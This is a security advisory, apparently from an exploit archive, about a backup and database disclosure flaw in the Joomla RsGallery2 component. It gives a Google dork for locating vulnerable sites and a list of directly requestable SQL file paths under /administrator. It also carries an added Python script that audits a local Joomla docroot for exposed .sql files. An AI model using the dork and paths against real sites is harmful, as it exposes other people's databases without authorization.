Joomla RsGallery2 4.4.1 Database Disclosure

Joomla RsGallery2 component version 4.4.1 suffers from a database disclosure vulnerability.


MD5 | 0e9a391df198dad8e20f8014f7497db6

#################################################################################################

# Exploit Title : Joomla Com_RsGallery2 Components 4.4.1 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : rsgallery2.org ~ extensions.joomla.org/extension/rsgallery2/
# Software Download Link : rsgallery2.org/index.php/download
+ github.com/RSGallery2/RSGallery2_Component/releases/download/Version_4.4.1/RSGallery2_Component.4.4.1.zip
+ github.com/RSGallery2/RSGallery2_Component/releases
+ github.com/DimaSamodurov/erasvit/blob/master/administrator/components/com_rsgallery2/sql/rsgallery2.sql
+ github.com/DimaSamodurov/erasvit/tree/master/administrator/components/com_rsgallery2
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.11 ~ 4.4.1 ~ 4.2.101 ~ 4.2.102 ~ 4.2.103 ~ 4.3.0 ~ 4.3.1 alpha ~ 4.3.1 ~ 4.4.1 alpha + 4.4.1 beta ~ 4.4.1_beta 2
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_rsgallery2/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/administrator

# Exploit :

/administrator/components/com_rsgallery2/sql/rsgallery2.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.10.14_to_1.11.0.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.0_to_1.11.1.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.10_to_1.11.11.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.11_to_1.12.0.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.12.1_to_1.12.2.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.12.2_to_1.13.2.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.13.2_to_1.14.0.sql

/administrator/sql/updates/mysql/3.0.0.sql

/administrator/sql/updates/mysql/4.0.0.sql

/administrator/sql/updates/mysql/4.3.0.sql

/administrator/sql/updates/install.mysql.utf8.sql

/administrator/sql/updates/uninstall.mysql.utf8.sql
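
Added example, not part of the original advisory: a local audit that an administrator can run against their own Joomla document root. It lists every .sql file under administrator/ (the locations named above) and flags which ones contain row data rather than schema statements only. The function names, the sample tree and the file contents are constructed for illustration.

```python
import os
import re
import tempfile

# SQL statements that carry row data (as opposed to schema-only DDL).
DATA_STMT = re.compile(rb"^\s*(?:INSERT|REPLACE)\s+INTO\b", re.IGNORECASE | re.MULTILINE)

def audit_sql_files(docroot):
    """Return sorted [(web_path, has_row_data)] for .sql files under <docroot>/administrator."""
    findings = []
    admin = os.path.join(docroot, "administrator")
    for dirpath, _dirs, files in os.walk(admin):
        for name in files:
            if not name.lower().endswith(".sql"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                has_data = bool(DATA_STMT.search(fh.read()))
            # Path as a browser would request it, relative to the document root.
            web_path = "/" + os.path.relpath(full, docroot).replace(os.sep, "/")
            findings.append((web_path, has_data))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample layout; backup_copy.sql and all contents are hypothetical."""
    samples = {
        "administrator/components/com_rsgallery2/sql/rsgallery2.sql":
            b"CREATE TABLE IF NOT EXISTS `#__example_table` (`id` int);\n",
        "administrator/components/com_rsgallery2/sql/backup_copy.sql":
            b"INSERT INTO `#__example_users` VALUES (1, 'constructed');\n",
        "administrator/components/com_rsgallery2/index.html": b"<html></html>\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for web_path, has_data in audit_sql_files(root):
            label = "ROW DATA" if has_data else "schema only"
            print(f"{label:11}  {web_path}")
```

Each reported path is reachable by URL unless the web server is configured to deny requests for .sql files under /administrator; entries flagged as row data deserve review first.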

#################################################################################################

# Example Vulnerable Site =>


#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
